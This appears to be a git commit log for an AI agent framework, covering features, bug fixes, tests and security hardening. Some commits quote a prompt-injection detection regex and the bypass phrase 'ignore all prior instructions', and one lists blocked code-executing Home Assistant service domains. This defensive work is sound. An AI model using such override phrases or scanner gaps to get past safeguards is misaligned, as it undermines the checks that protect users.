- tools/debug_helpers.py: DebugSession enable/disable, log, save, session info
- tools/skills_guard.py: scan_file, scan_skill, trust levels, install policy, structural checks
- tools/skills_sync.py: manifest read/write, skill discovery, sync logic
- gateway/sticker_cache.py: cache CRUD, sticker injection text builders
- gateway/channel_directory.py: channel resolution, display formatting, session building
- gateway/hooks.py: hook discovery, sync/async emit, wildcard matching
- gateway/mirror.py: session lookup, JSONL append, mirror_to_session
- honcho_integration/client.py: config from env/file, session name resolution, linked workspaces

Also documents a gap in skills_guard: multi-word prompt injection
variants like "ignore all prior instructions" bypass the regex scanner.

* test: strengthen sticker injection tests with exact format assertions

Replace loose "contains" checks with exact output matching for
build_sticker_injection and build_animated_sticker_injection.
Add edge cases: set_name without emoji, empty description, empty emoji.

* test: remove skills_guard gap-documenting test to avoid conflict with fix PR
2026-03-01 05:28:12 -08:00
0xbyt4
900d48714a Merge remote-tracking branch 'origin/main' into test/expand-coverage-4
# Conflicts:
#	tests/agent/test_auxiliary_client.py
2026-03-01 12:11:54 +03:00
0xbyt4
3fdf03390e Merge remote-tracking branch 'origin/main' into feature/homeassistant-integration
# Conflicts:
#	run_agent.py
2026-03-01 11:59:12 +03:00
0xbyt4
25fb9aafcb fix: add service domain blocklist and entity_id validation to HA tools
Block dangerous HA service domains (shell_command, command_line,
python_script, pyscript, hassio, rest_command) that allow arbitrary
code execution or SSRF. Add regex validation for entity_id to prevent
path traversal attacks. 17 new tests covering both security features.
2026-03-01 11:53:50 +03:00
Bartok Moltbot
54147474d3 feat(gateway): include Discord channel topic in session context
Fixes #163

- Add chat_topic field to SessionSource dataclass
- Update to_dict/from_dict for serialization support
- Add chat_topic parameter to build_source helper
- Extract channel.topic in Discord adapter for messages and slash commands
- Display Channel Topic in system prompt when available
- Normalize empty topics to None
2026-03-01 03:48:24 -05:00
teknium1
4d6f380bd1 docs: update README and CLI documentation for new commands
Enhanced the README and CLI documentation to include the newly added `/compress` and `/usage` commands for managing conversation context and monitoring token usage. Updated log descriptions to clarify the contents of log files and ensured that sensitive information is automatically redacted. This improves user understanding of available features and log management.
2026-03-01 00:28:07 -08:00
teknium1
93f5fd80b8 feat(gateway): add /compress and /usage commands for conversation management
Implemented the /compress command to allow users to manually compress conversation context, ensuring sufficient history is available before execution. The /usage command was also added to display token usage statistics for the current session, including prompt and completion tokens. Updated command documentation to reflect these new features.
2026-03-01 00:25:44 -08:00
teknium1
177be32b7f feat(cli): add /usage command to display session token usage
Introduced a new command "/usage" in the CLI to show cumulative token usage for the current session. This includes details on prompt tokens, completion tokens, total tokens, API calls, and context state. Updated command documentation to reflect this addition. Enhanced the AIAgent class to track token usage throughout the session.
2026-03-01 00:23:19 -08:00
teknium1
30efc263ff feat(cli): add /compress command for manual conversation context compression
Introduced a new command "/compress" to the CLI, allowing users to manually trigger context compression on the current conversation. The method checks for sufficient conversation history and active agent status before performing compression, providing feedback on the number of messages and tokens before and after the operation. Updated command documentation accordingly.
2026-03-01 00:16:38 -08:00
Bartok Moltbot
ed0e860abb fix(honcho): auto-enable when API key is present
Fixes #241

When users set HONCHO_API_KEY via `hermes config set` or environment
variable, they expect the integration to activate. Previously, the
`enabled` flag defaulted to `false` when reading from global config,
requiring users to also explicitly enable Honcho.

This change auto-enables Honcho when:
- An API key is present (from config file or env var)
- AND `enabled` is not explicitly set to `false` in the config

Users who want to disable Honcho while keeping the API key can still
set `enabled: false` in their config.

Also adds unit tests for the auto-enable behavior.
2026-03-01 03:12:37 -05:00
teknium1
41d8a80226 fix(display): fix subagent progress tree-view visual nits
Two fixes to the subagent progress display from PR #186:

1. Task index prefix: show 1-indexed prefix ([1], [2], ...) for ALL
   tasks in batch mode (task_count > 1). Single tasks get no prefix.
   Previously task 0 had no prefix while others did, making batch
   output confusing.

2. Completion indicator: use spinner.print_above() instead of raw
   print() for per-task completion lines (✓ [1/2] ...). Raw print
   collided with the active spinner, mushing the completion text
   onto the spinner line. Now prints cleanly above.

Added task_count parameter to _build_child_progress_callback and
_run_single_child. Updated tests accordingly.
2026-02-28 23:29:49 -08:00
teknium1
4ec386cc72 fix(display): use spaces instead of ANSI \033[K in print_above() for prompt_toolkit compat
print_above() used \033[K (erase-to-end-of-line) to clear the spinner
line before printing text above it. This causes garbled escape codes when
prompt_toolkit's patch_stdout is active in CLI mode.

Switched to the same spaces-based clearing approach used by stop() —
overwrite with blanks, then carriage return back to start of line.

Updated test assertion to match the new clearing method.
2026-02-28 23:19:23 -08:00
lila
dd69f16c3e feat(gateway): expose subagent tool calls and thinking to user (fixes #169) (#186)
When subagents run via delegate_task, the user now sees real-time
progress instead of silence:

CLI: tree-view activity lines print above the delegation spinner
  🔀 Delegating: research quantum computing
     ├─ 💭 "I'll search for papers first..."
     ├─ 🔍 web_search  "quantum computing"
     ├─ 📖 read_file  "paper.pdf"
     └─ ⠹ working... (18.2s)

Gateway (Telegram/Discord): batched progress summaries sent every
5 tool calls to avoid message spam. Remaining tools flushed on
subagent completion.

Changes:
- agent/display.py: add KawaiiSpinner.print_above() to print
  status lines above an active spinner without disrupting animation.
  Uses captured stdout (self._out) so it works inside the child's
  redirect_stdout(devnull).

- tools/delegate_tool.py: add _build_child_progress_callback()
  that creates a per-child callback relaying tool calls and
  thinking events to the parent's spinner (CLI) or progress
  queue (gateway). Each child gets its own callback instance,
  so parallel subagents don't share state. Includes _flush()
  for gateway batch completion.

- run_agent.py: fire tool_progress_callback with '_thinking'
  event when the model produces text content. Guarded by
  _delegate_depth > 0 so only subagents fire this (prevents
  gateway spam from main agent). REASONING_SCRATCHPAD/think/
  reasoning XML tags are stripped before display.

Tests: 21 new tests covering print_above, callback builder,
thinking relay, SCRATCHPAD filtering, batching, flush, thread
isolation, delegate_depth guard, and prefix handling.
2026-02-28 23:18:00 -08:00
teknium1
1db5598294 feat(tests): add live integration tests for file operations and shell noise filtering
- Introduce a new test suite in `test_file_tools_live.py` to validate file operations and ensure accurate command execution in a real environment.
- Implement assertions to check for shell noise contamination in outputs, enhancing the reliability of command results.
- Create fixtures for setting up a local environment and populating directories with known file contents for comprehensive testing.
- Refactor shell noise handling in `process_registry.py` and `local.py` to support multiple noise patterns, improving output cleanliness.
2026-02-28 22:57:58 -08:00
teknium1
23d0b7af6a feat(logging): implement persistent error logging for tool failures
- Introduce a separate error log for capturing warnings and errors related to tool execution, ensuring detailed inspection of issues post-failure.
- Enhance error handling in the AIAgent class to log exceptions with stack traces for better debugging.
- Add a similar error logging mechanism in the gateway to streamline debugging processes.
2026-02-28 22:49:58 -08:00
teknium1
a7c2b9e280 fix(display): enhance memory error detection for tool failures
- Implement logic to distinguish between "full" memory errors and actual failures in the `_detect_tool_failure` function.
- Add JSON parsing to identify specific error messages related to memory limits, improving error handling for memory-related tools.
2026-02-28 22:49:52 -08:00
teknium1
70dfec9638 test(redact): add sensitive text redaction
- Introduce a new test suite for the `redact_sensitive_text` function, covering various sensitive data formats including API keys, tokens, and environment variables.
- Ensure that sensitive information is properly masked in logs and outputs while non-sensitive data remains unchanged.
- Add tests for different scenarios including JSON fields, authorization headers, and environment variable assignments.
- Implement a redacting formatter for logging to enhance security during log output.
2026-02-28 21:56:27 -08:00
teknium1
95b0610f36 refactor(cli, auth): Add Codex/OpenAI OAuth Support - finalized
- Replace `hermes login` with `hermes model` for selecting providers and managing authentication.
- Update documentation and CLI commands to reflect the new provider selection process.
- Introduce a new redaction system for logging sensitive information.
- Enhance Codex model discovery by integrating API fetching and local cache.
- Adjust max turns configuration logic for better clarity and precedence.
- Improve error handling and user feedback during authentication processes.
2026-02-28 21:56:27 -08:00
teknium1
500f0eab4a refactor(cli): Finalize OpenAI Codex Integration with OAuth
- Enhanced Codex model discovery by fetching available models from the API, with fallback to local cache and defaults.
- Updated the context compressor's summary target tokens to 2500 for improved performance.
- Added external credential detection for Codex CLI to streamline authentication.
- Refactored various components to ensure consistent handling of authentication and model selection across the application.
2026-02-28 21:47:51 -08:00
Teknium
86b1db0598 Merge pull request #43 from grp06/codex/align-codex-provider-conventions-mainrepo
Enable ChatGPT subscription Codex support end-to-end
2026-02-28 18:13:58 -08:00
Teknium
5a79e423fe Merge branch 'main' into codex/align-codex-provider-conventions-mainrepo 2026-02-28 18:13:38 -08:00
teknium1
7f7643cf63 feat(hooks): introduce event hooks system for lifecycle management
Add a new hooks system allowing users to run custom code at key lifecycle points in the agent's operation. This includes support for events such as `gateway:startup`, `session:start`, `agent:step`, and more. Documentation for creating hooks and available events has been added to `README.md` and a new `hooks.md` file. Additionally, integrate step callbacks in the agent to facilitate hook execution during tool-calling iterations.
2026-02-28 17:09:26 -08:00
teknium1
bf52468a91 fix(gateway): improve MEDIA tag handling to prevent duplication across turns
Refactor the extraction of MEDIA paths to collect them from the history before processing the current turn's messages. This change ensures that MEDIA tags are deduplicated based on previously seen paths, preventing TTS voice messages from being re-attached in subsequent replies. This addresses the issue outlined in #160.
2026-02-28 16:49:49 -08:00
Teknium
b4688f10d4 Merge pull request #176 from Bartok9/fix-tts-voice-accumulation
fix(gateway): prevent TTS voice messages from accumulating across turns
2026-02-28 16:45:52 -08:00
Teknium
31a5cd185a Merge pull request #174 from Bartok9/fix-think-block-leakage
fix: strip <think> blocks from final response to users
2026-02-28 16:43:47 -08:00
Farukest
7166647ca1 fix(security): add re.DOTALL to prevent multiline bypass of dangerous command detection 2026-03-01 03:23:29 +03:00
Farukest
f7300a858e fix(tools): use task-specific glob pattern in disk usage calculation 2026-03-01 03:17:50 +03:00
Farukest
e87859e82c fix(agent): copy conversation_history to avoid mutating caller's list 2026-03-01 03:06:13 +03:00
Farukest
de101a8202 fix(agent): strip _flush_sentinel from API messages 2026-03-01 02:51:31 +03:00
Farukest
7f1f4c2248 fix(tools): preserve empty content in ReadResult.to_dict() 2026-03-01 02:42:15 +03:00
Farukest
c33f8d381b fix: correct off-by-one in retry exhaustion checks
The retry exhaustion checks used > instead of >= to compare
retry_count against max_retries. Since the while loop condition is
retry_count < max_retries, the check retry_count > max_retries can
never be true inside the loop. When retries are exhausted, the loop
exits and falls through to response.choices[0] on an invalid response,
crashing with IndexError instead of returning a proper error.
2026-03-01 02:27:26 +03:00
Farukest
3f58e47c63 fix: guard POSIX-only process functions for Windows compatibility
os.setsid, os.killpg, and os.getpgid do not exist on Windows and raise
AttributeError on import or first call. This breaks the terminal tool,
code execution sandbox, process registry, and WhatsApp bridge on Windows.

Added _IS_WINDOWS platform guard in all four affected files, following
the pattern documented in CONTRIBUTING.md. On Windows, preexec_fn is
set to None and process termination falls back to proc.terminate() /
proc.kill() instead of process group signals.

Files changed:
- tools/environments/local.py (3 call sites)
- tools/process_registry.py (2 call sites)
- tools/code_execution_tool.py (3 call sites)
- gateway/platforms/whatsapp.py (3 call sites)
2026-03-01 01:54:27 +03:00
Farukest
b7f8a17c24 fix(gateway): persist transcript changes in /retry, /undo and fix /reset
/retry and /undo set session_entry.conversation_history which does not
exist on SessionEntry. The truncated history was never written to disk,
so the next message reload picked up the full unmodified transcript.

Added SessionStore.rewrite_transcript() that persists changes to both
the JSONL file and SQLite database, and updated both commands to use it.

/reset accessed self.session_store._sessions which does not exist on
SessionStore (the correct attribute is _entries). Also replaced the
hand-coded session key with _generate_session_key() to fix WhatsApp DM
sessions using the wrong key format.

Closes #210
2026-03-01 01:40:30 +03:00
VolodymyrBg
6cbb8f3a0c fix: align _apply_delete comment with actual behavior 2026-02-28 22:58:01 +02:00
gizdusum
ec97f9ad1a feat(skills): add Solana blockchain skill (converted from tool) 2026-02-28 23:39:39 +03:00
0xbyt4
10085041cf feat: add ascii-art skill for creative text banners and art
Unicode-based ASCII art generator skill with multiple styles
(block, shadow, outlined, gradient, decorative frame), character
palette reference, and usage examples. No external dependencies.
2026-02-28 22:33:10 +03:00
teknium1
7b23dbfe68 feat(animation): add support for sending animated GIFs in BasePlatformAdapter and TelegramAdapter 2026-02-28 11:25:44 -08:00
teknium1
8e0c48e6d2 feat(skills): implement dynamic skill slash commands for CLI and gateway 2026-02-28 11:18:50 -08:00
0xbyt4
b759602483 fix: prevent italic regex from spanning newlines in Telegram formatter
The italic regex \*([^*]+)\* used [^*] which matches newlines, causing
bullet lists with * markers to be incorrectly converted to italic text.
Changed to [^*\n]+ to prevent cross-line matching.

Adds 43 tests for _escape_mdv2 and format_message covering code blocks,
bold/italic, headers, links, mixed formatting, and the regression case.
2026-02-28 22:01:48 +03:00
teknium1
2205b22409 fix(headers): update X-OpenRouter-Categories to include 'productivity' 2026-02-28 10:38:49 -08:00
teknium1
1ddf8c26f5 refactor(cli): update max turns configuration precedence and enhance documentation 2026-02-28 10:35:49 -08:00
0xbyt4
9769e07cd5 test: add 25 unit tests for trajectory_compressor
Tests cover CompressionConfig (defaults, from_yaml with full/partial/empty),
TrajectoryMetrics and AggregateMetrics (to_dict, aggregation, division-by-zero
guards), _find_protected_indices (basic, all-protected, no tail, missing roles,
disabled protection), _extract_turn_content_for_summary (basic, truncation,
empty range), and token counting (empty, basic, trajectory, fallback on error).
2026-02-28 21:28:28 +03:00
0xbyt4
08250a53a1 fix: skills hub dedup prefers higher trust levels + 43 tests
- unified_search and GitHubSource.search dedup: replace naive
  `trust_level == "trusted"` check with ranked comparison so
  "builtin" results are never overwritten by "trusted" or "community"
- Add 43 unit tests covering _parse_frontmatter_quick, trust_level_for,
  HubLockFile CRUD, TapsManager ops, LobeHub _convert_to_skill_md,
  unified_search dedup (with regression test), and append_audit_log
2026-02-28 21:25:55 +03:00
0xbyt4
ff6d62802d fix: platform base extract_images and truncate_message bugs + tests
- extract_images: only remove extracted image tags from content, preserve
  non-image markdown links (e.g. PDFs) that were previously silently lost
- truncate_message: walk only chunk_body (not prepended prefix) so the
  reopened code fence does not toggle in_code off, leaving continuation
  chunks with unclosed code blocks
- Add 49 unit tests covering MessageEvent command parsing, extract_images,
  extract_media, truncate_message code block handling, and _get_human_delay
2026-02-28 21:21:03 +03:00
0xbyt4
46506769f1 test: add unit tests for 5 security/logic-critical modules (batch 4)
- gateway/pairing.py: rate limiting, lockout, code expiry, approval flow (28 tests)
- tools/skill_manager_tool.py: validation, path traversal prevention, CRUD (46 tests)
- tools/skills_tool.py: frontmatter/tag parsing, skill discovery, view chain (34 tests)
- agent/auxiliary_client.py: auth reading, API key resolution, param branching (16 tests)
- honcho_integration/session.py: session dataclass, ID sanitization, transcript format (20 tests)
2026-02-28 20:33:48 +03:00
0xbyt4
4ea29978fc fix(security): catch multi-word prompt injection in skills_guard
The regex `ignore\s+(previous|all|...)\s+instructions` only matched
a single keyword between 'ignore' and 'instructions'. Phrases like
'ignore all prior instructions' bypassed the scanner entirely.

Changed to `ignore\s+(?:\w+\s+)*(previous|all|...)\s+instructions`
to allow arbitrary words before the keyword.
2026-02-28 20:16:48 +03:00
0xbyt4
dfd50ceccd fix: preserve Gemini thought_signature in tool call messages
Gemini 3 thinking models attach extra_content with thought_signature
to function call responses. This must be echoed back on subsequent
API calls or the server rejects with a 400 error. The assistant
message builder was dropping this field, causing all Gemini 3 Flash/Pro
tool-calling flows to fail after the first function call.
2026-02-28 18:10:05 +03:00
teknium1
6366177118 refactor: update context compression configuration to use config.yaml and improve model handling 2026-02-28 04:46:38 -08:00
0xbyt4
2390728cc3 fix: resolve 4 bugs found in HA integration code review
- Auto-authorize HA events in gateway (system-generated, not user messages)
- Guard _read_events against None/closed WebSocket after failed reconnect
- Use UUID for send() message_id instead of polluting WS sequence counter
- entity_id parameter now takes precedence over data["entity_id"]
2026-02-28 15:12:18 +03:00
0xbyt4
b32c642af3 test: add HA integration tests with fake in-process server
Fake HA server (aiohttp.web) simulates full API surface over real TCP:
- WebSocket auth handshake + event push
- REST endpoints (states, services, notifications)

14 integration tests verify end-to-end flows without mocks:
- WS connect/auth/subscribe/event-forwarding/disconnect
- REST list/get/call-service against fake server
- send() notification delivery and auth failure
- 401/500 error handling
2026-02-28 14:28:04 +03:00
0xbyt4
c36b256de5 feat: add Home Assistant integration (REST tools + WebSocket gateway)
- Add ha_list_entities, ha_get_state, ha_call_service tools via REST API
- Add WebSocket gateway adapter for real-time state_changed event monitoring
- Support domain/entity filtering, cooldown, and auto-reconnect with backoff
- Use REST API for outbound notifications to avoid WS race condition
- Gate tool availability on HASS_TOKEN env var
- Add 82 unit tests covering real logic (filtering, payload building, event pipeline)
2026-02-28 13:32:48 +03:00
Teknium
0afe1b707d Merge pull request #178 from gamedevCloudy/main
fix(install): ignore commented lines when checking for PATH
2026-02-28 02:14:31 -08:00
Aayush Chaudhary
f213620c8b fix(install): ignore commented lines when checking for existing PATH configuration 2026-02-28 14:28:18 +05:30
Bartok9
35655298e6 fix(gateway): prevent TTS voice messages from accumulating across turns
Fixes #160

The issue was that MEDIA tags were being extracted from ALL messages
in the conversation history, not just messages from the current turn.
This caused TTS voice messages generated in earlier turns to be
re-attached to every subsequent reply.

The fix:
- Track history_len before calling run_conversation
- Only scan messages AFTER history_len for MEDIA tags
- Add comprehensive tests to prevent regression

This ensures each voice message is sent exactly once, when it's
generated, not on every subsequent message in the session.
2026-02-28 03:38:27 -05:00
Bartok9
1e463a8e39 fix: strip <think> blocks from final response to users
Fixes #149

The _strip_think_blocks() method existed but was not applied to the
final_response in the normal completion path. This caused <think>...</think>
XML tags to leak into user-facing responses on all platforms (CLI, Telegram,
Discord, Slack, WhatsApp).

Changes:
- Strip think blocks from final_response before returning in normal path (line ~2600)
- Strip think blocks from fallback content when salvaging from prior tool_calls turn

Notes:
- The raw content with think blocks is preserved in messages[] for trajectory
  export - this only affects the user-facing final_response
- The _has_content_after_think_block() check still uses raw content before
  stripping, which is correct for detecting think-only responses
2026-02-28 03:06:20 -05:00
teknium1
de5a88bd97 refactor: migrate tool progress configuration from environment variables to config.yaml 2026-02-28 00:05:58 -08:00
teknium1
0862fa96fd refactor(domain-intel): streamline documentation and add CLI tool for domain intelligence operations 2026-02-27 23:53:24 -08:00
Teknium
924570c5be Merge pull request #136 from FurkanL0/feat/domain-intel-skill
feat(skills): add passive domain intelligence skill — subdomains, SSL, WHOIS, DNS, availability
2026-02-27 23:47:50 -08:00
teknium1
4d8689c10c feat: add honcho-ai package to dependencies and update extras in uv.lock 2026-02-27 23:45:52 -08:00
teknium1
1d7ce5e063 feat: integrate honcho-ai package and enhance tool progress callback in delegate_tool 2026-02-27 23:45:52 -08:00
Teknium
72d3425eef Merge pull request #94 from cesareth/feat/verbose-slash-command
feat(cli): add /verbose slash command to toggle debug output at runtime
2026-02-27 23:41:25 -08:00
teknium1
b7f099beed feat: add Honcho integration for cross-session user modeling 2026-02-27 23:41:08 -08:00
Teknium
912ef50165 Merge pull request #38 from plastic-labs/feat/honcho-integration
feat: Honcho memory integration (opt-in)
2026-02-27 23:35:29 -08:00
Teknium
4a9086b848 Merge branch 'main' into feat/honcho-integration 2026-02-27 23:32:49 -08:00
teknium1
50cb4d5fc7 fix(agent): update error message for unsupported Anthropic API endpoints to clarify usage of OpenRouter 2026-02-27 23:23:31 -08:00
Teknium
2bc9508b7c Merge pull request #173 from adavyas/fix/anthropic-base-url-guard
fix(agent): fail fast on Anthropic native base URLs
2026-02-27 23:22:01 -08:00
Teknium
337cd574c8 Merge pull request #167 from Jr-kenny/pr/docs-codefences
fix(docs): add missing code block language specifiers
2026-02-27 23:16:27 -08:00
Teknium
9fb027915e Merge pull request #166 from Jr-kenny/pr/docs-config
fix(docs): correct CLI config precedence and paths
2026-02-27 23:15:36 -08:00
Teknium
2b821c3a14 Merge pull request #162 from aydnOktay/fix/memory-tool-entry-delimiter-parsing
Fix memory tool entry parsing when content contains section sign
2026-02-27 23:13:15 -08:00
Teknium
0d113fab1a Merge pull request #158 from Indelwin/feature/docker-volumes
feat: add docker_volumes config for custom volume mounts
2026-02-27 23:06:06 -08:00
teknium1
19f28a633a fix(agent): enhance 413 error handling and improve conversation history management in tests 2026-02-27 23:04:32 -08:00
Teknium
2c817ce4a5 Merge pull request #153 from tekelala/main
fix(agent): handle 413 payload-too-large via compression instead of aborting
2026-02-27 22:57:55 -08:00
teknium1
66a5bc64db fix(process): use shlex to safely quote commands in bg_command for improved security 2026-02-27 22:50:26 -08:00
Teknium
7f423508e4 Merge pull request #151 from johnh4098/fix/shell-injection-spawn-via-env-v2
fix(process): escape single quotes in spawn_via_env bg_command
2026-02-27 22:49:04 -08:00
Teknium
306c6706a6 Merge pull request #150 from VencentSoliman/fix/gateway-model-personality-commands
fix(gateway): sync /model and /personality with CLI pattern
2026-02-27 22:48:03 -08:00
Teknium
64be67e062 Merge pull request #146 from alireza78a/fix/atomic-cron-job-save
fix(cron): use atomic write in save_jobs to prevent data loss
2026-02-27 22:16:43 -08:00
adavyas
0c0a2eb0a2 fix(agent): fail fast on Anthropic native base URLs 2026-02-27 21:19:29 -08:00
teknium1
de0829cec3 fix(cli): increase max iterations for child agents and extend API call timeout for improved reliability 2026-02-27 17:35:29 -08:00
Teknium
20177660bb Merge pull request #142 from Bartok9/docs/add-slash-commands-reference
docs: add slash commands reference
2026-02-27 17:33:19 -08:00
Jr-kenny
609fc6d080 fix(docs): add missing code block language specifiers 2026-02-28 02:04:38 +01:00
Jr-kenny
518826e70c fix(docs): standardize terminology and CLI formatting 2026-02-28 02:03:39 +01:00
Jr-kenny
13992a58da fix(docs): correct CLI config precedence and paths 2026-02-28 02:00:32 +01:00
Teknium
0d2ac1c07f Merge pull request #121 from Bartok9/test-clarify-tool
test(tools): add unit tests for clarify_tool.py
2026-02-27 16:27:37 -08:00
teknium1
fb7df099e0 feat(cli): add shell noise filtering and improve command execution with interactive login shell 2026-02-27 16:26:47 -08:00
teknium1
f14ff3e041 feat(cli): use user's login shell for command execution to ensure environment consistency 2026-02-27 15:10:27 -08:00
VencentSoliman
07fcb94bc0 fix(gateway): sync /model and /personality with CLI config.yaml pattern 2026-02-27 17:39:25 -05:00
aydnOktay
66d9983d46 Fix memory tool entry parsing when content contains section sign
- Use ENTRY_DELIMITER (\\n§\\n) instead of '§' when splitting entries in _read_file
- Prevents incorrect parsing when memory entries contain '§' character
- Aligns read logic with write logic for consistency
2026-02-28 01:33:41 +03:00
teknium1
4f3cb98e5e feat(cli): implement platform-specific toolset selection with improved user interface 2026-02-27 14:26:23 -08:00
teknium1
8c1f5efcab feat(cli): add toolset API key validation and improve checklist display 2026-02-27 13:56:43 -08:00
teknium1
c92bdd8785 fix(cli): improve spinner line clearing to prevent garbled output with prompt_toolkit 2026-02-27 13:49:06 -08:00
teknium1
e09ef6b8bc feat(gateway): improve model command handling by resolving current model from environment and config file 2026-02-27 13:42:07 -08:00
Gesina Sands
f7677ed275 feat: add docker_volumes config for custom volume mounts 2026-02-28 07:12:48 +10:00
johnh4098
e5f719a33b fix(process): escape single quotes in spawn_via_env bg_command 2026-02-27 21:03:17 +03:30
tekelala
79bd65034c fix(agent): handle 413 payload-too-large via compression instead of aborting
The 413 "Request Entity Too Large" error from the LLM API was caught by the
generic 4xx handler which aborts immediately. This is wrong for 413 — it's a
payload-size issue that can be resolved by compressing conversation history.

- Intercept 413 before the generic 4xx block and route to _compress_context
- Exclude 413 from generic is_client_error detection
- Add 'request entity too large' to context-length phrases as safety net
- Add tests for 413 compression behavior

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-27 12:21:27 -05:00
tekelala
fbb1923fad fix(security): patch path traversal, size bypass, and prompt injection in document processing
- Sanitize filenames in cache_document_from_bytes to prevent path traversal (strip directory components, null bytes, resolve check)
- Reject documents with None file_size instead of silently allowing download
- Cap text file injection at 100 KB to prevent oversized prompt payloads
- Sanitize display_name in run.py context notes to block prompt injection via filenames
- Add 35 unit tests covering document cache utilities and Telegram document handling

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-27 11:53:46 -05:00
alireza78a
bf75c450b7 fix(cron): use atomic write in save_jobs to prevent data loss 2026-02-27 20:16:49 +03:30
tekelala
b2172c4b2e feat(telegram): add document file processing for PDF, text, and Office files
Download, cache, and enrich document files sent via Telegram. Supports
.pdf, .md, .txt, .docx, .xlsx, .pptx with size validation, unsupported
type rejection, text content injection for .md/.txt, and hourly cache
cleanup.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-27 11:44:57 -05:00
Bartok Moltbot
69ccd76679 docs: add slash commands reference
Adds a comprehensive reference for all CLI slash commands including:
- Navigation & control commands
- Tools & configuration commands
- Conversation management
- Advanced features (cron, skills, platforms)
- Usage examples
- Tips for users

Makes it easier for new users to discover available commands.
2026-02-27 10:50:53 -05:00
teknium1
8b54bb4d89 docs: update CONTRIBUTING.md to enhance contribution guidelines and clarify priorities 2026-02-27 06:37:36 -08:00
kaos35
2595d81733 feat: Add Superpowers software development skills
Add 5 new skills for professional software development workflows,
adapted from the Superpowers project ( obra/superpowers ):

- test-driven-development: RED-GREEN-REFACTOR cycle enforcement
- systematic-debugging: 4-phase root cause investigation
- subagent-driven-development: Structured delegation with two-stage review
- writing-plans: Comprehensive implementation planning
- requesting-code-review: Systematic code review process

These skills provide structured development workflows that transform
Hermes from a general assistant into a professional software engineer
with defined processes for quality assurance.

Skills are organized under software-development category and follow
Hermes skill format with proper frontmatter, examples, and integration
guidance with existing skills.
2026-02-27 15:32:58 +01:00
FurkanL0
f9e05218ca Create SKILL.md 2026-02-27 17:07:13 +03:00
FurkanL0
2ddda5da89 Create DESCRIPTION.md 2026-02-27 17:06:17 +03:00
Teknium
dc80f0b222 Merge pull request #117 from Bartok9/docs/add-contributing-guide
docs: add CONTRIBUTING.md with contributor guidelines
2026-02-27 05:22:31 -08:00
teknium1
5007a122b2 fix(terminal): enhance error logging in cleanup functions with exception info 2026-02-27 03:53:58 -08:00
Teknium
43f2321225 Merge pull request #91 from 0xbyt4/fix/cli-spinner-flickering
fix(cli): reduce spinner flickering under patch_stdout
2026-02-27 03:48:32 -08:00
Teknium
1362f92f2e Merge pull request #89 from 0xbyt4/fix/cli-show-config-wrong-path
fix(cli): show correct config file path in /config command
2026-02-27 03:48:13 -08:00
teknium1
445d2646a9 Enhance arXiv integration: Add BibTeX generation, ID versioning, and withdrawn paper handling. Update search script to display version information alongside arXiv IDs. 2026-02-27 03:45:59 -08:00
Teknium
ae8d25faca Merge pull request #87 from 0xbyt4/fix/cli-max-turns-sentinel
fix(cli): respect explicit --max-turns value even when it equals default
2026-02-27 03:42:18 -08:00
Teknium
9061c03b6d Merge pull request #84 from 0xbyt4/fix/cli-paste-detection-false-positive
fix(cli): prevent paste detection from destroying multi-line input
2026-02-27 03:40:13 -08:00
Teknium
8174f5a988 Merge pull request #83 from 0xbyt4/fix/cli-save-config-string-model
fix(cli): prevent crash in save_config_value when model is a string
2026-02-27 03:36:39 -08:00
teknium1
03f7b551be Update README.md: Add DeepWiki Docs badge and enhance security description for sandboxing feature 2026-02-27 03:27:17 -08:00
Teknium
80ad6572a3 Merge pull request #75 from satelerd/fix/whatsapp-multi-user-sessions
fix(whatsapp): multi-user session isolation and bridge message handling
2026-02-27 03:25:54 -08:00
teknium1
c77f3da0ce Cherry-pick 6 bug fixes from PR #76 and update documentation
Code fixes (run_agent.py):
- Fix off-by-one in _flush_messages_to_session_db skipping one message per flush
- Add clear_interrupt() to 3 early-return paths preventing stale interrupt state
- Wrap handle_function_call in try/except so tool crashes don't kill the conversation
- Replace fragile `is` identity check with _flush_sentinel marker for memory flush cleanup
- Fix retry loop off-by-one (6 attempts not 7)
- Remove redundant inline `import re`
2026-02-27 03:21:49 -08:00
teknium1
c104647450 Documentation (README.md):
- Add "Security Hardening" section with table of protections from recent PRs
- Add "Reasoning Effort" config section under Features
- Add Slack and WhatsApp env vars to Environment Variables Reference
- Remove non-functional ANTHROPIC_API_KEY from env vars table
- Add `hermes whatsapp` to Commands section

Documentation (docs/messaging.md):
- Rewrite WhatsApp section to reflect Baileys bridge and `hermes whatsapp` flow
- Add Slack env vars, adapter to architecture diagram, and platform toolsets table
2026-02-27 03:21:42 -08:00
Teknium
547ba73b82 Merge pull request #65 from leonsgithub/fix/sudo-password-shell-injection
fix(security): prevent shell injection in sudo password piping
2026-02-27 01:50:07 -08:00
Teknium
3526fa27fd Merge pull request #62 from 0xbyt4/test/expand-coverage-2
test: add unit tests for 8 modules (batch 2)
2026-02-27 01:47:30 -08:00
Teknium
9eabdb64ff Merge pull request #72 from cutepawss/fix/install-script-silent-abort
fix: prevent silent abort in piped install when interactive prompts fail (#69)
2026-02-27 01:45:06 -08:00
Teknium
6f543eac9f Merge branch 'main' into fix/install-script-silent-abort 2026-02-27 01:44:59 -08:00
Teknium
64eca85876 Merge pull request #67 from 0xbyt4/test/add-run-agent-unit-tests
test: add unit tests for run_agent.py (AIAgent)
2026-02-27 01:36:49 -08:00
Teknium
152271851f Merge pull request #63 from 0xbyt4/fix/cron-prompt-injection-bypass
fix: cron prompt injection scanner bypass for multi-word variants
2026-02-27 01:34:14 -08:00
Teknium
0909be3aa8 Merge pull request #61 from 0xbyt4/fix/write-deny-macos-symlink
fix: resolve symlink bypass in write deny list on macOS
2026-02-27 01:32:19 -08:00
Teknium
274e623b50 Merge pull request #60 from 0xbyt4/test/expand-coverage
test: add unit tests for 8 untested core modules
2026-02-27 01:30:36 -08:00
Teknium
2972f982e4 Merge pull request #55 from bierlingm/fix/atexit-signal-handler-race
Fix SystemExit traceback during atexit cleanup on Ctrl+C
2026-02-27 00:42:23 -08:00
Bartok Moltbot
df8a62d018 test(tools): add unit tests for clarify_tool.py
Add comprehensive test coverage for the clarify_tool module:

- TestClarifyToolBasics: 5 tests for core functionality
  - Simple questions, questions with choices, error handling

- TestClarifyToolChoicesValidation: 5 tests for choices parameter
  - MAX_CHOICES enforcement, empty/whitespace handling, type conversion

- TestClarifyToolCallbackHandling: 3 tests for callback behavior
  - Exception handling, question/response trimming

